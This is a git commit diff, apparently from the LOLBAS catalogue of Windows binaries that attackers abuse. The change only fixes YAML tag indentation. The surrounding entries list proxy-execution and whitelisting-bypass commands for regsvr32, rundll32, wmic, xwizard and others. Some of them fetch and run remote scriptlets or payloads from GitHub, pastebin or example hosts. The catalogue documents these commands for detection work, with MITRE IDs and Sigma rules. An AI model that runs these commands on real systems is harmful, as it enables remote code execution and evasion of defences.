Correct identation

2024-12-30 16:54:00 +01:00 · 2024-10-13 17:57:36 +02:00 · 2024-10-13 17:57:36 +02:00 · 75d04eaf72
commit 75d04eaf72
parent 6375a4a338
28 changed files with 54 additions and 54 deletions
--- a/yml/OSBinaries/Presentationhost.yml
+++ b/yml/OSBinaries/Presentationhost.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
-    - Execute: XBAP
+      - Execute: XBAP
  - Command: Presentationhost.exe https://example.com/payload
    Description: It will download a remote payload and place it in INetCache.
    Usecase: Downloads payload from remote server
--- a/yml/OSBinaries/Provlaunch.yml
+++ b/yml/OSBinaries/Provlaunch.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
    Tags:
-    - Execute: CMD
+      - Execute: CMD
 Full_Path:
  - Path: c:\windows\system32\provlaunch.exe
 Detection:
--- a/yml/OSBinaries/Regsvr32.yml
+++ b/yml/OSBinaries/Regsvr32.yml
@ -12,8 +12,8 @@ Commands:
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: SCT
+      - Execute: SCT
-    - Execute: Remote
+      - Execute: Remote
  - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
    Description: Execute the specified local .SCT script with scrobj.dll.
    Usecase: Execute code from scriptlet, bypass Application whitelisting
@ -22,7 +22,7 @@ Commands:
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: SCT
+      - Execute: SCT
  - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
    Description: Execute the specified remote .SCT script with scrobj.dll.
    Usecase: Execute code from remote scriptlet, bypass Application whitelisting
@ -31,8 +31,8 @@ Commands:
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: SCT
+      - Execute: SCT
-    - Execute: Remote
+      - Execute: Remote
  - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
    Description: Execute the specified local .SCT script with scrobj.dll.
    Usecase: Execute code from scriptlet, bypass Application whitelisting
@ -41,7 +41,7 @@ Commands:
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: SCT
+      - Execute: SCT
 Full_Path:
  - Path: C:\Windows\System32\regsvr32.exe
  - Path: C:\Windows\SysWOW64\regsvr32.exe
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@ -30,7 +30,7 @@ Commands:
    MitreID: T1218.011
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: JScript
+      - Execute: JScript
  - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
    Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
    Usecase: Proxy execution
@ -39,7 +39,7 @@ Commands:
    MitreID: T1218.011
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: JScript
+      - Execute: JScript
  - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
    Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
    Usecase: Proxy execution
@ -48,7 +48,7 @@ Commands:
    MitreID: T1218.011
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: JScript
+      - Execute: JScript
  - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
    Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
    Usecase: Execute code from Internet
@ -57,7 +57,7 @@ Commands:
    MitreID: T1218.011
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: JScript
+      - Execute: JScript
  - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
    Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
    Usecase: Execute code from alternate data stream
--- a/yml/OSBinaries/Runexehelper.yml
+++ b/yml/OSBinaries/Runexehelper.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
    Tags:
-    - Execute: EXE
+      - Execute: EXE
 Full_Path:
  - Path: c:\windows\system32\runexehelper.exe
 Detection:
--- a/yml/OSBinaries/Runonce.yml
+++ b/yml/OSBinaries/Runonce.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: CMD
+      - Execute: CMD
 Full_Path:
  - Path: C:\Windows\System32\runonce.exe
  - Path: C:\Windows\SysWOW64\runonce.exe
--- a/yml/OSBinaries/Runscripthelper.yml
+++ b/yml/OSBinaries/Runscripthelper.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
-    - Execute: Powershell
+      - Execute: Powershell
 Full_Path:
  - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
  - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
--- a/yml/OSBinaries/Sc.yml
+++ b/yml/OSBinaries/Sc.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
  - Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing>
    Description: Modifies an existing service and executes the file stored in the ADS.
    Usecase: Execute binary file hidden inside an alternate data stream
@ -21,7 +21,7 @@ Commands:
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
 Full_Path:
  - Path: C:\Windows\System32\sc.exe
  - Path: C:\Windows\SysWOW64\sc.exe
--- a/yml/OSBinaries/Schtasks.yml
+++ b/yml/OSBinaries/Schtasks.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1053.005
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
  - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
    Description: Create a scheduled task on a remote computer for persistence/lateral movement
    Usecase: Create a remote task to run daily relative to the the time of creation
@ -21,7 +21,7 @@ Commands:
    MitreID: T1053.005
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
 Full_Path:
  - Path: c:\windows\system32\schtasks.exe
  - Path: c:\windows\syswow64\schtasks.exe
--- a/yml/OSBinaries/Scriptrunner.yml
+++ b/yml/OSBinaries/Scriptrunner.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1202
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
  - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
    Description: Executes calc.cmd from remote server
    Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
@ -21,8 +21,8 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: Remote
+      - Execute: Remote
-    - Execute: CMD
+      - Execute: CMD
 Full_Path:
  - Path: C:\Windows\System32\scriptrunner.exe
  - Path: C:\Windows\SysWOW64\scriptrunner.exe
--- a/yml/OSBinaries/Setres.yml
+++ b/yml/OSBinaries/Setres.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
    Tags:
-    - Execute: EXE
+      - Execute: EXE
 Full_Path:
  - Path: c:\windows\system32\setres.exe
 Detection:
--- a/yml/OSBinaries/SettingSyncHost.yml
+++ b/yml/OSBinaries/SettingSyncHost.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows 8, Windows 8.1, Windows 10
    Tags:
-    - Execute: EXE
+      - Execute: EXE
  - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything
    Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32.
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file.
@ -21,7 +21,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows 8, Windows 8.1, Windows 10
    Tags:
-    - Execute: EXE
+      - Execute: EXE
 Full_Path:
  - Path: C:\Windows\System32\SettingSyncHost.exe
  - Path: C:\Windows\SysWOW64\SettingSyncHost.exe
--- a/yml/OSBinaries/Ssh.yml
+++ b/yml/OSBinaries/Ssh.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1202
    OperatingSystem: Windows 10 1809, Windows Server 2019
    Tags:
-    - Execute: EXE
+      - Execute: EXE
  - Command: ssh -o ProxyCommand=calc.exe .
    Description: Executes calc.exe from ssh.exe
    Usecase: Performs execution of specified file, can be used as a defensive evasion.
@ -21,7 +21,7 @@ Commands:
    MitreID: T1202
    OperatingSystem: Windows 10
    Tags:
-    - Execute: EXE
+      - Execute: EXE
 Full_Path:
  - Path: c:\windows\system32\OpenSSH\ssh.exe
 Detection:
--- a/yml/OSBinaries/Stordiag.yml
+++ b/yml/OSBinaries/Stordiag.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows 10
    Tags:
-    - Execute: EXE
+      - Execute: EXE
  - Command: stordiag.exe
    Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.
    Usecase: Possible defence evasion purposes.
@ -21,7 +21,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
 Full_Path:
  - Path: c:\windows\system32\stordiag.exe
  - Path: c:\windows\syswow64\stordiag.exe
--- a/yml/OSBinaries/Syncappvpublishingserver.yml
+++ b/yml/OSBinaries/Syncappvpublishingserver.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
    Tags:
-    - Execute: Powershell
+      - Execute: Powershell
 Full_Path:
  - Path: C:\Windows\System32\SyncAppvPublishingServer.exe
  - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
--- a/yml/OSBinaries/Ttdinject.yml
+++ b/yml/OSBinaries/Ttdinject.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1127
    OperatingSystem: Windows 10 2004 and above, Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
  - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
    Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
    Usecase: Spawn process using other binary
@ -21,7 +21,7 @@ Commands:
    MitreID: T1127
    OperatingSystem: Windows 10 1909 and below
    Tags:
-    - Execute: EXE
+      - Execute: EXE
 Full_Path:
  - Path: C:\Windows\System32\ttdinject.exe
  - Path: C:\Windows\Syswow64\ttdinject.exe
--- a/yml/OSBinaries/Tttracer.yml
+++ b/yml/OSBinaries/Tttracer.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1127
    OperatingSystem: Windows 10 1809 and newer, Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
  - Command: TTTracer.exe -dumpFull -attach pid
    Description: Dumps process using tttracer.exe. Requires administrator privileges
    Usecase: Dump process by PID
--- a/yml/OSBinaries/Unregmp2.yml
+++ b/yml/OSBinaries/Unregmp2.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1202
    OperatingSystem: Windows 10
    Tags:
-    - Execute: EXE
+      - Execute: EXE
 Full_Path:
  - Path: C:\Windows\System32\unregmp2.exe
  - Path: C:\Windows\SysWOW64\unregmp2.exe
--- a/yml/OSBinaries/Verclsid.yml
+++ b/yml/OSBinaries/Verclsid.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218.012
    OperatingSystem: Windows 10, Windows 11
    Tags:
-    - Execute: DLL
+      - Execute: DLL
 Full_Path:
  - Path: C:\Windows\System32\verclsid.exe
  - Path: C:\Windows\SysWOW64\verclsid.exe
--- a/yml/OSBinaries/Wab.yml
+++ b/yml/OSBinaries/Wab.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: DLL
+      - Execute: DLL
 Full_Path:
  - Path: C:\Program Files\Windows Mail\wab.exe
  - Path: C:\Program Files (x86)\Windows Mail\wab.exe
--- a/yml/OSBinaries/Winget.yml
+++ b/yml/OSBinaries/Winget.yml
@ -12,8 +12,8 @@ Commands:
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
-    - Execute: Remote
+      - Execute: Remote
-    - Execute: EXE
+      - Execute: EXE
  - Command: winget.exe install --accept-package-agreements -s msstore [name or ID]
    Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.'
    Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked
--- a/yml/OSBinaries/Wlrmdr.yml
+++ b/yml/OSBinaries/Wlrmdr.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1202
    OperatingSystem: Windows 10, Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
 Full_Path:
  - Path: c:\windows\system32\wlrmdr.exe
 Code_Sample:
--- a/yml/OSBinaries/Wmic.yml
+++ b/yml/OSBinaries/Wmic.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
  - Command: wmic.exe process call create calc
    Description: Execute calc from wmic
    Usecase: Execute binary from wmic to evade defensive counter measures
@ -21,7 +21,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
  - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
    Description: Execute evil.exe on the remote system.
    Usecase: Execute binary on a remote system
@ -30,8 +30,8 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
-    - Execute: Remote
+      - Execute: Remote
  - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
    Description: Create a volume shadow copy of NTDS.dit that can be copied.
    Usecase: Execute binary on remote system
@ -40,8 +40,8 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: XSL
+      - Execute: XSL
-    - Execute: Remote
+      - Execute: Remote
  - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
    Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
    Usecase: Execute script from remote system
--- a/yml/OSBinaries/WorkFolders.yml
+++ b/yml/OSBinaries/WorkFolders.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
 Full_Path:
  - Path: C:\Windows\System32\WorkFolders.exe
 Detection:
--- a/yml/OSBinaries/Xwizard.yml
+++ b/yml/OSBinaries/Xwizard.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: DLL
+      - Execute: DLL
  - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
    Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
    Usecase: Run a com object created in registry to evade defensive counter measures
@ -21,7 +21,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-    - Execute: DLL
+      - Execute: DLL
  - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
    Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
    Usecase: Download file from Internet
--- a/yml/OSBinaries/msedge_proxy.yml
+++ b/yml/OSBinaries/msedge_proxy.yml
@ -28,7 +28,7 @@ Commands:
    MitreID: T1218.015
    OperatingSystem: Windows 10, Windows 11
    Tags:
-    - Execute: CMD
+      - Execute: CMD
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml
 Acknowledgement:
--- a/yml/OSBinaries/msedgewebview2.yml
+++ b/yml/OSBinaries/msedgewebview2.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218.015
    OperatingSystem: Windows 10, Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
  - Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe"
    Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
    Usecase: Proxy execution of binary
@ -21,7 +21,7 @@ Commands:
    MitreID: T1218.015
    OperatingSystem: Windows 10, Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
  - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe"
    Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
    Usecase: Proxy execution of binary
@ -30,7 +30,7 @@ Commands:
    MitreID: T1218.015
    OperatingSystem: Windows 10, Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
  - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe"
    Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
    Usecase: Proxy execution of binary
@ -39,7 +39,7 @@ Commands:
    MitreID: T1218.015
    OperatingSystem: Windows 10, Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
 Full_Path:
  - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe
 Detection:
--- a/yml/OSBinaries/wt.yml
+++ b/yml/OSBinaries/wt.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1202
    OperatingSystem: Windows 11
    Tags:
-    - Execute: EXE
+      - Execute: EXE
 Full_Path:
  - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe
 Detection: